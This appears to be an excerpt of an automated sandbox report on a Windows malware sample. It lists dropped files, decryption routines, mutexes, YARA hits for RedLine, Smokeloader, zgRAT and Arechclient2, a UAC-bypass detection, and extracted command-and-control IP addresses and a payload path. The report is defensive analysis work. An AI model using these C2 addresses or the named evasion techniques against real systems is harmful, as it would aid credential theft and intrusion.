Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC59BA0	2_2_6BC59BA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCC9BB0	2_2_6BCC9BB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDFB60	2_2_6BCDFB60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC4BB20	2_2_6BC4BB20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC01AE0	2_2_6BC01AE0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDDAB0	2_2_6BCDDAB0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD89A50	2_2_6BD89A50
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC3FA10	2_2_6BC3FA10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCA1A10	2_2_6BCA1A10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCFDA30	2_2_6BCFDA30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC999C0	2_2_6BC999C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC399D0	2_2_6BC399D0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC659F0	2_2_6BC659F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC979F0	2_2_6BC979F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC11980	2_2_6BC11980
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD1990	2_2_6BCD1990
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC7F960	2_2_6BC7F960
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCBD960	2_2_6BCBD960
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD4F900	2_2_6BD4F900
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB5920	2_2_6BCB5920
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC9F8C0	2_2_6BC9F8C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC0D8E0	2_2_6BC0D8E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC338E0	2_2_6BC338E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD5B8F0	2_2_6BD5B8F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDF8F0	2_2_6BCDF8F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD3840	2_2_6BCD3840
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC5D810	2_2_6BC5D810
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD1DFC0	2_2_6BD1DFC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD83FC0	2_2_6BD83FC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCABFF0	2_2_6BCABFF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC21F90	2_2_6BC21F90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF5F30	2_2_6BBF5F30
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC35F20	2_2_6BC35F20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD57F20	2_2_6BD57F20
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC23EC0	2_2_6BC23EC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD5BE70	2_2_6BD5BE70
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD85E60	2_2_6BD85E60
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD0DE10	2_2_6BD0DE10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD1DC0	2_2_6BCD1DC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BBF3D80	2_2_6BBF3D80
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD49D90	2_2_6BD49D90
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0020F840	3_2_0020F840
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001F4060	3_2_001F4060
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00216130	3_2_00216130
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001F2120	3_2_001F2120
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0020B150	3_2_0020B150
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00249A00	3_2_00249A00
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0023CAA0	3_2_0023CAA0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00204390	3_2_00204390
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00210390	3_2_00210390
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_0021FC10	3_2_0021FC10
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001FD570	3_2_001FD570
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00245550	3_2_00245550
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_002496E0	3_2_002496E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_002166F0	3_2_002166F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001FA6F0	3_2_001FA6F0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_001F37B0	3_2_001F37B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C804D8F	3_2_6C804D8F
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C803D16	3_2_6C803D16
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C81371C	3_2_6C81371C
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_6C77D24D	3_2_6C77D24D

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BD8DAE0 appears 67 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BC5C5E0 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BD809D0 appears 282 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BC23620 appears 88 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BC29B10 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BD39F30 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: String function: 6BD8D930 appears 54 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 036736F8 appears 184 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 03697A73 appears 43 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 03679F27 appears 48 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 03671D46 appears 44 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 0042780C appears 43 times
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Code function: String function: 03671BE3 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 001F1900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 001F14F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 001F1310 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 00379D36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 6C804701 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 001F1930 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: String function: 6C806320 appears 31 times

One or more processes crash

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3664 -s 968

Sample file is different than original file name gathered from version info

Source: sx8RE6LbG0.exe, 00000000.00000003.2075830262.0000000003795000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2071578865.00000000037B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070408708.0000000003788000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001DB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070439016.0000000003799000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004BF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073990551.000000000378B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2094919127.00000000037BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000002.2423173870.0000000001A1D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075245239.0000000003795000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2076626113.00000000037DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075390741.000000000379E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073925424.0000000003782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2019130046.0000000003701000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2153198605.0000000001D2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075093112.0000000003787000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070109629.0000000003782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073613131.00000000037A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073192567.0000000003795000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073415349.000000000379C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2073816464.0000000003780000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000002.2424663925.0000000003749000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2075627426.0000000003782000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2071977209.00000000037A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2077142039.00000000037B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2070164179.000000000379F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2071838564.0000000003795000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe, 00000000.00000003.2152517615.0000000004FE4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs sx8RE6LbG0.exe
Source: sx8RE6LbG0.exe	Binary or memory string: OriginalFilenameFirezer0 vs sx8RE6LbG0.exe

Uses 32bit PE files

Source: sx8RE6LbG0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 3.2.run.exe.410ed5b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.cmd.exe.5b000c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 24.2.cmd.exe.556c264.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.run.exe.40ca86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.run.exe.3903d5b.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5b600c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.515de64.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.5b600c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 22.2.run.exe.38bf86d.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.MSBuild.exe.1200000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.5119976.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 24.2.cmd.exe.556ce64.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 22.2.run.exe.390315b.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 4.2.cmd.exe.5b000c8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 4.2.cmd.exe.515d264.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.run.exe.410e15b.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21729406ca8.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 24.2.cmd.exe.5528976.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171726d525.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.2171729432f.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f3537d.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f54dad.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.217172b8739.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21713f447a3.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000002.00000002.2530199003.0000000001A44000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2424325171.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2424005663.0000000001CE5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000002.00000002.2530861686.0000000003500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\jipsoiol, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\dvffdl, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT

Source: 4.2.cmd.exe.5b000c8.8.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.21731ea0000.9.raw.unpack, LHMFCLLKPJPNLPEMOOMPKGFGGJLDMBDEHOHN.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@44/79@10/11

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Code function: 2_2_6BC60300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

2_2_6BC60300

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_0022D660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,

3_2_0022D660

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_01CE678E CreateToolhelp32Snapshot,Module32First,

0_2_01CE678E

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,

0_2_0042628B

Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe

Code function: 3_2_00208040 LoadResource,LockResource,SizeofResource,

3_2_00208040

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2800:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5256
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3664

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File created: C:\Users\user\AppData\Local\Temp\u2ts.0.exe

Jump to behavior

Source: Yara match	File source: 6.0.u2ts.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.2151539522.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2152517615.0000000004BDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u2ts.3.exe, type: DROPPED

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
